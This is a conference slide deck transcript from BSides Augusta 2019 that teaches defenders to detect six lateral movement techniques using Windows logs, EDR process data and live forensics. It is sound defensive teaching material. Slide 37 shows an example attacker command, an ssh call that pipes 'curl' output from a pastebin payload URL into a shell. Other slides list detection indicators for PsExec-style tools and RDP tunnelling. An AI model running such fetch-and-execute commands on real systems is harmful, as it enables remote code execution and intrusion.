Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Spotting Lateral Movement - BSides Augusta 2019

Tony M Lambert
October 05, 2019
Technology
1
860

Spotting Lateral Movement - BSides Augusta 2019

Lateral movement is an integral part of adversary movement into and around networks. This functionality is now built into relatively inexpensive and widely available malware in addition to operating systems for system administration. There is some good news: you CAN detect an adversary moving around your network with the proper telemetry and analysis. This session will arm defenders with techniques to detect six commonly used methods to move laterally using endpoint data.

Tony M Lambert

October 05, 2019
Tweet

More Decks by Tony M Lambert

See All by Tony M Lambert
The Wild World of macOS Installers
forensicitguy
0
20
Whitelisting LD_PRELOAD For Fun and No Profit
forensicitguy
0
260
Alertable Techniques for Linux using MITRE ATT&CK
forensicitguy
1
2k
Intelligence Driven Testing with Atomic Red Team
forensicitguy
2
330
Spotting Lateral Movement with Endpoint Data
forensicitguy
2
550

Other Decks in Technology

See All in Technology
Designing an Incident Response Process at Scale
opeonikute
0
160
F0推定アルゴリズムHarvestは中で何をしているのか
nagiss
1
220
(n=1の)テーブルデータコンペの取り組み方
makotu
2
1.2k
Towards sustainable learning, designing, and decision-making
emgsilva
2
120
著作権とは何か?〜初歩的概念から権利利用法、侵害要件まで
line_developers
PRO
5
890
サーバーレスアーキテクチャを使って、小さく作って大きくする取り組み
daikimori
0
740
UIコンポーネントライブラリをうまく使うためにできること / components-with-designer
mottox2
4
2k
IoTだからこそ、サーバーレスを活用すべき3つの理由
soracom
PRO
2
460
仲間から嫌われがちだった私が、アジャイルに出会い、仲間から慕われるようになるまでの道のり / I was often disliked by my peers, but then I met Agile, How I came to be admired by my peers
pauli
0
540
2023-09-05_OCIJP_まれによくあるマルチクラウドでDB-AP分離構成のこと
hk_shino
2
180
KARTEのAPIサーバ化
line_developers
PRO
1
240
テンションも揚げてこう! Ebitengine開発
lapis2411
0
160

Featured

See All Featured
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
271
12k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
17
1.3k
Writing Fast Ruby
sferik
615
59k
The Straight Up "How To Draw Better" Workshop
denniskardys
226
130k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
16
1.4k
Optimizing for Happiness
mojombo
368
67k
Raft: Consensus for Rubyists
vanstee
130
5.9k
Building Applications with DynamoDB
mza
87
5.2k
Robots, Beer and Maslow
schacon
154
7.6k
The World Runs on Bad Software
bkeepers
PRO
59
6k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
15
1.6k
Scaling GitHub
holman
455
140k

Transcript

  1. Spotting Lateral
    Movement
    Using Endpoint Data

    View Slide

  2. ▪ Find & detect adversaries using data
    ▪ Recovering system administrator
    ▪ Love to teach, hate to grade homework
    Tony Lambert
    Detection Engineer/Intel
    RED CANARY
    @ForensicITGuy
    $env:UserName

    View Slide

  3. > > > > >
    > > > > >
    > > > > >
    > > > > >
    > > > > >
    > > > > >

    View Slide

  4. What the admin sees...
    Malicious movement

    View Slide

  5. What’s endpoint data anyways?
    Lateral Movement Techniques
    ▪ Windows Admin Shares
    ▪ Windows Remote Management
    ▪ Remote Desktop Protocol
    ▪ Pass the Hash
    ▪ Exploitation of Remote Services
    ▪ Remote Services
    Overview

    View Slide

  6. Log Data
    Everything has logs!
    Many options
    System integration
    Too much data?
    Misconfigurations

    View Slide

  7. Endpoint Detection & Response
    Flight recorder
    Process metadata
    Happy medium
    Hard to manage
    No content
    Mostly for processes

    View Slide

  8. Live Forensics
    Full content
    Max visibility
    Hard to scale
    Human correlation
    Issues with ephemeral

    View Slide

  9. Windows Admin
    Shares

    View Slide

  10. ▪ Hidden network shares for admins
    ▪ Copy files & schedule execution
    ▪ ADMIN$ == %SystemRoot% == C:\Windows
    \\win10-pc\ADMIN$
    Windows Admin Shares

    View Slide

  11. Windows Admin Shares - Copy
    ▪ Logs
    ○ 5140 - Network Share Accessed
    ○ 5145 - Network Share Access Checked
    ○ 4624 - Account Logged On (Type 3)

    View Slide

  12. Windows Admin Shares - Service
    ▪ Logs
    ○ 7045 - New Service
    ▪ EDR
    ○ parent process == services.exe
    ○ path == System32 OR sysWOW64

    View Slide

  13. Windows Admin Shares - Both
    ▪ Live Forensics
    ○ New files in C:\Windows (NTFS Entry Number)
    ○ Services in Registry
    (HKLM\SYSTEM\CurrentControlSet\Services)

    View Slide

  14. Bonus! PsExec Clones
    ▪ Named Pipes (Sysmon Event ID 17)
    ○ PsExec - \\.\pipe\psexesvc
    ○ RemCom - \\.\pipe\remcom_comunication
    ○ PaExec - *PAExec*
    ○ CSExec - \\.\pipe\csexecsvc

    View Slide

  15. Windows Remote
    Management

    View Slide

  16. Windows Remote Management
    ▪ Admin all the systems!
    ▪ WinRM configures, can also call WMI
    ▪ WinRS issues remote commands
    ▪ WMI does a little of everything
    ▪ PowerShell Remoting builds on previous tools

    View Slide

  17. WinRS
    ▪ Logs
    ○ ID 169 - User authenticating to WinRM service
    ○ ID 4624 - User Logged On (Logon Type 3)
    ▪ EDR
    ○ Receiver parent process == winrshost.exe
    ○ Sender process == winrs.exe -r:

    View Slide

  18. Windows Mgmt Instrumentation
    ▪ Logs
    ○ ID 5857 - WMI Activity StartedOperational
    ○ ID 4624 - User Logged On (Logon Type 3 & 5)
    ▪ EDR
    ○ Receiver parent process == wmiprvse.exe
    ○ Sender process == wmic.exe /node:

    View Slide

  19. PowerShell Remoting
    ▪ Logs
    ○ ID 4104 - Suspicious PS Script Block
    ○ ID 4624 - User Logged On (Logon Type 3)
    ▪ EDR
    ○ Receiver parent process == wsmprovhost.exe
    ○ Sender process == powershell.exe OR pwsh.exe

    View Slide

  20. Windows Remote Management
    ▪ Live Forensics
    ○ Relies heavily on mature logs and process auditing
    ○ Process execution artifacts (Prefetch, etc…)
    ○ PowerShell transcripts, ConsoleHost_history.txt

    View Slide

  21. Remote Desktop
    Management

    View Slide

  22. Remote Desktop Management
    ▪ Admin with a GUI
    ▪ Shares clipboard, printers, disks, etc…
    ▪ Often used for a desktop experience

    View Slide

  23. Remote Desktop Management
    ▪ Logs
    ○ ID 1149 - Successful RDP Remote Connection
    ○ ID 4624 - User Logged On (Logon Type 10 or 7)
    ▪ EDR
    ○ Telltale processes == rdpclip.exe
    ○ Sender process == mstsc.exe

    View Slide

  24. Remote Desktop Mgmt - Activity
    ▪ EDR
    ○ Parent processes == explorer.exe, cmd.exe, etc.
    ▪ Live Forensics
    ○ Prefetch parsing
    ○ User activity forensics like local logon

    View Slide

  25. Remote Desktop Mgmt - Tunnelling
    ▪ EDR
    ○ plink.exe AND cmdline includes 127.0.0.1:3389
    ○ netsh.exe AND cmdline includes connectp AND 3389
    ▪ Live Forensics
    ○ HKCU\SYSTEM\CurrentControlSet\Services\PortProxy
    ○ Artifacts of plink.exe execution

    View Slide

  26. Pass the Hash

    View Slide

  27. Pass the Hash
    ▪ Authentication using NTLM hashes
    ▪ No cleartext password
    ▪ Mitigate with Win10 Credential Guard
    ▪ Mitigate with Domain Protected Users group

    View Slide

  28. Pass the Hash
    ▪ Logs
    ○ ID 4672 - Special Privileges Logon
    ○ ID 4624 - User Logged On (Logon Type 3 or 9)
    ○ ID 10 - Sysmon (ProcessAccess lsass.exe)
    ○ Not a domain logon
    ○ Not the ANONYMOUS LOGON account

    View Slide

  29. Pass the Hash
    ▪ EDR
    ○ Doesn’t know the difference
    ▪ Live Forensics
    ○ Grab the local logs
    ○ Credential theft tools and material on disk

    View Slide

  30. Exploitation of
    Remote Services

    View Slide

  31. Exploitation of Remote Services
    ▪ On Windows, primarily Server Message Block (SMB)
    ▪ “ETERNALBLUE” or maybe “BLUEKEEP” in the future

    View Slide

  32. Exploitation of Remote Services
    ▪ Logs
    ○ Depending on exploit, sparse logging
    ○ Code injection (if you have Sysmon)
    ▪ EDR
    ○ Abnormal parent/child relationships
    ○ lsass.exe, spoolsv.exe spawning child processes

    View Slide

  33. Exploitation of Remote Services
    ▪ Live forensics
    ○ Evidence of code injection (memory forensics)
    ○ Exploit code left on system

    View Slide

  34. Remote Services

    View Slide

  35. Remote Services
    ▪ On Windows, SMB
    ▪ On macOS & Linux, SSH & VNC
    ▪ Using services designed for remote connections
    ▪ Not always associated with remote administration

    View Slide

  36. Remote Services
    ▪ Logs
    ○ Depends on service
    ○ SSH - /var/log/secure (RHEL) /var/log/auth.log (Debian)
    ▪ EDR
    ○ Child processes of SSHD and VNC daemons
    ○ “ssh” commands with suspicious command lines

    View Slide

  37. Remote Services
    ssh … [email protected] 'curl
    hxxps://pastebin.com/payload | sh'

    View Slide

  38. Remote Services
    ▪ Live Forensics
    ○ Recovering logs
    ○ Filesystem artifacts correlated with logon
    ○ Shell history

    View Slide

  39. FEEDBACK
    Q & A
    Special thanks to:
    Michael Gough @hackerhurricane
    Carlos Perez @darkoperator
    JP-CERT @jpcert_en
    Matt Graeber @mattifestation
    MITRE ATT&CK @MITREattack
    SANS DFIR @sansforensics
    Matthew Dunwood @matthewdunwoody
    FireEye @fireeye
    Jonathon Poling @JPoForenso
    STEALTHbits @STEALTHbits

    View Slide